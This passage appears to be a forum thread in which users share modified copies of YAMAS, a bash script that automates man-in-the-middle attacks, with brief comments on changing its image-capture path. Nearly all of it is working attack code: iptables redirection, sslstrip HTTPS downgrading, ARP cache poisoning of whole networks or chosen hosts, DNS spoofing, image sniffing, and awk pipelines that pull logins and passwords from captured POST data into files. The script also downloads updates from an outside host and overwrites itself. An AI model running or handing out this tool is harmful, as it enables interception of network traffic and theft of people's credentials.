kill -18 $looparseid
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31m
kill $looparseid
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32m
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m - Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m - Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m - Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x "$sslstrip_dir/sslstrip.py" ];then #if the non-installed copy is not executable (double quotes so the variable expands)
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m - Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway address or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "\nDo you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else
echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.[/spoiler]
-
Well, I've got it now.
The captures go to /root/driftnet/capeta_fecha-captura >:(
I removed the menu option to choose between driftnet and the other sniffer, .... and made driftnet the automatic choice,
so when you press option 5 ... the extras menu appears, which shows
image sniffing
You just select that option, et voilà.. nothing else to do.. that is.. before, you chose that option and it asked you which sniffer to launch.. now it does it all automatically. >:( >:( >:(
I used the command geminis_demon posted and then adjusted the capture path and modified the image capturing option.
[spoiler]#!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
if [ $UID -ne 0 ]; then
echo -e "\033[31mThis program must be run as root.
This will probably fail.\033[m"
sleep 3
fi
log_output_dir=/root/driftnet
sslstrip_dir=
ask_for_install=n
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C caught. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
exit 0 ;;
-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "You are running $0, version $version.
usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
-f : Use a padlock favicon in sslstrip.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;
-c | --change)
clear
echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are supported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
exit ;;
-s | --silent)
echo "silent mode ON"
silent="1"
shift ;;
-f | --fav)
echo "favicon mode ON"
fav="-f"
shift ;;
*) shift ;;
esac
done
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
message="\nNo message to display : you are running in silent mode"
else
message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi
if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "ASCII tables won't be available."
echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi
### Check for updates !
if [[ "$silent" = "1" ]];then
echo "Not checking for a new version : silent mode."
else
changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
if [[ $last_version > $version ]];then # Comparing to current version
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
read update
if [[ $update = Y || $update = y ]];then
echo "
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else
echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else
echo "Ok, continuing with current version..."
fi
else
echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else
echo "Ok, not installing then !"
fi
else
echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
\`YMM' \`MM' db \`7MMM. ,MMF' db .M\"\"\"bgd
VMA ,V ;MM: MMMb dPMM ;MM: ,MI \"Y
VMA ,V ,V^MM. M YM ,M MM ,V^MM. \`MMb.
VMMP ,M \`MM M Mb M' MM ,M \`MM \`YMMNq.
MM AbmmmqMA M YM.P' MM AbmmmqMA . \`MM
MM A' VML M \`YM' MM A' VML Mb dM
.JMML..AMA. .AMMA..JML. \`' .JMML..AMA. .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m - Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m- Killing processes and resetting iptable.\033[m"
kill $sslstripid
kill $looparseid
if [[ $drifton = 1 ]]; #if driftnet was used
then
echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
if [[ ! -e $log_output_dir ]]; #check if destination folder exists, since driftnet won't create one nor save images
then
mkdir $log_output_dir #create if needed
fi
killall driftnet #kill the unbeliever
elif [[ $drifton = 2 ]]; #if tcpxtract was used
then
killall tcpxtract #kill it...
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else
echo "Logs not saved"
fi
echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else
echo "Error while saving passwords" #it does not
fi
else
echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
echo -e "\n\n"
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
case $install in
Y | y | yes)
cp $0 /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m" ;;
*) echo "Script not installed." ;;
esac
fi
exit 1
}
search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -en "\033[m"
final
}
add_target()
{
echo "Enter a new IP address to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}
dns_spoof()
{
### Make Host function###
mkhst()
{
echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
rm ~/hosts_spoof
while :
do
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]];then
break
fi
done
}
###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
echo "Host file $gothost will be used."
else
echo -e "We'll make one...\n"
mkhst
fi
xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}
choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
D) echo "We'll use dnsspoof."
dns_spoof ;;
a | A) final ;;
*) echo "Wrong choice. Please use E or D"
choose_dns;;
esac
final
}
misc()
{
echo -e "\nHere are the miscellaneous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
1) image_menu
final ;;
2) choose_dns ;;
3) final ;;
*) echo "bad choice"
misc ;;
esac
}
image_menu()
{
echo -e "Would you rather use driftnet (display images) or tcpxtract ?
1. Tcpxtract (saves all images to $log_output_dir/capture[date])
2. Driftnet (Display images on screen and save all images to $log_output_dir/capture[date])"
read image_choice
case $image_choice in
1) tcpxtract -d $iface -o $log_output_dir/capture_$(date +%d%m%y) > /dev/null & tcpid=$!
drifton=2
echo "tcpxtract is launched with pid $tcpid"
misc ;;
2) driftnet -i $iface -d $log_output_dir &> /dev/null &
drifton=1
echo "Driftnet launched."
misc ;;
esac
}
rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out? It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m
kill -19 $looparseid
echo -e "\033[33m[-]Paused.\033[m"
rtparse;;
2) echo -e "\033[33m
kill -18 $looparseid
echo -e "\033[33m[-]Resumed.\033[m"
rtparse;;
3) echo -e "\033[31m
kill $looparseid
echo -e "\033[33m[-]Killed.\033[m"
rtparse;;
4) echo -e "\033[32m
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse;;
5) echo "Previous"
final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
rtparse;;
esac
}
final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.
Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) rtparse ;;
5) misc ;;
6) cleanup ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final ;;
esac
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m - Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m - Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m - Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m - Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "\nDo you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else
echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
[/spoiler]
-
Let's see, I have it like this:
[spoiler]
# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
if [ $UID -ne 0 ]; then
echo -e "\033[31mThis program must be run as root.
This will probably fail.\033[m"
sleep 3
fi
log_output_dir=~
sslstrip_dir=
ask_for_install=n
if [ ! -d "$log_output_dir" ]; then
mkdir -p $log_output_dir
fi
version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
kill $looparseid
fi
if [[ $sslstripid != "" ]];then
kill $sslstripid
fi
if [[ $dnsid != "" ]];then
kill $dnsid
fi
if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi
if [[ "$etter" = "1" ]];then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
-p | --parse)
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
exit 0 ;;
-e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
etter="1"
shift
sleep 0.5 ;;
-h | --help) clear
echo -e "You are running $0, version $version.
usage : $0 -h -c -p -e -s -f
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
-f : Use a padlock favicon in sslstrip.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;
-c | --change)
clear
echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
